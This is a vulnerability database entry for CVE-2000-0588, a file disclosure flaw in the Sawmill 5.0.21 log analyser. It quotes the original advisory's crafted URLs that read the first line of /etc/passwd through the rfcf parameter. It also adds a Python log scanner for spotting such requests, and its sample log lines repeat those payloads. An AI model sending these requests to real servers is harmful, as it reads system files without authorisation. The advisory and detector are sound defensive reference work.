Flowerfire Sawmill File Access Vulnerability

Vulnerability ID: 1105899 Vulnerability type: Information disclosure
Published: 2000-06-26 Updated: 2005-05-02
CVE ID: CVE-2000-0588 CNNVD-ID: CNNVD-200006-100
Affected platform: CGI CVSS score: 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/20041
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200006-100
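|Vulnerability details
The CGI program in SawMill 5.0.21 contains a vulnerability. A remote attacker can read the first line of arbitrary files by listing the file in the rfcf parameter, because SawMill attempts to parse the contents of that file as configuration commands.
|Vulnerability EXP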
source: http://www.securityfocus.com/bid/1402/info

Sawmill is a site statistics package for Unix, Windows and Mac OS. A specially crafted request can disclose the first line of any world-readable file for which the full pathname is known, for example /etc/passwd. The output of the request is similar to the following: 'Unknown configuration command "root:x:0:0:root:/root:/bin/sh" in "/etc/passwd".'

The following request will display the first line of /etc/passwd:

http://target:port/sawmill?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3

If Sawmill is run as a CGI script, the following can be used instead:

http://target/cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
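
For defenders reviewing web server logs, the following added example (not part of the original advisory or of Sawmill itself) finds requests to a Sawmill URL that pass a file argument through rfcf, decoding the URL first so that percent-encoded variants are also caught. It assumes Common Log Format; the function name and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample lines in Common Log Format (not real traffic).
SAMPLE_LOG = '''\
192.0.2.10 - - [26/Jun/2000:10:01:02 +0000] "GET /cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1 HTTP/1.0" 200 312
192.0.2.11 - - [26/Jun/2000:10:02:40 +0000] "GET /index.html HTTP/1.0" 200 1043
192.0.2.12 - - [26/Jun/2000:10:03:15 +0000] "GET /sawmill?rfcf+%22%2Fetc%2Fpasswd%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3 HTTP/1.0" 200 298
192.0.2.13 - - [26/Jun/2000:10:04:00 +0000] "GET /cgi-bin/sawmill5?spbn+1,1,21,1,1,1,1 HTTP/1.0" 200 5120
'''

# Client address and request target from a Common Log Format line.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')
# The rfcf command followed by an optionally quoted file argument (after decoding).
RFCF_RE = re.compile(r'(?:^|\s)rfcf\s+"?([^"\s]+)"?')


def find_rfcf_requests(log_text):
    """Return (client, url_path, file_argument) for each Sawmill rfcf request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        parts = urlsplit(target)
        # Only look at requests addressed to a Sawmill binary or CGI script.
        if "sawmill" not in parts.path.lower():
            continue
        # '+' separates command words and %22 is a double quote; decode both.
        query = unquote_plus(parts.query)
        arg = RFCF_RE.search(query)
        if arg:
            hits.append((client, parts.path, arg.group(1)))
    return hits


if __name__ == "__main__":
    for client, path, file_arg in find_rfcf_requests(SAMPLE_LOG):
        print(f"{client} requested {path} with rfcf file {file_arg}")
```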
|References

Source: BUGTRAQ
Name: 20000626 sawmill5.0.21 old path bug & weak hash algorithm
Link: http://archives.neohapsis.com/archives/bugtraq/2000-06/0271.html
Source: BID
Name: 1402
Link: http://www.securityfocus.com/bid/1402
Source: BUGTRAQ
Name: 20000706 Patch for Flowerfire Sawmill Vulnerabilities Available
Link: http://archives.neohapsis.com/archives/bugtraq/2000-07/0080.html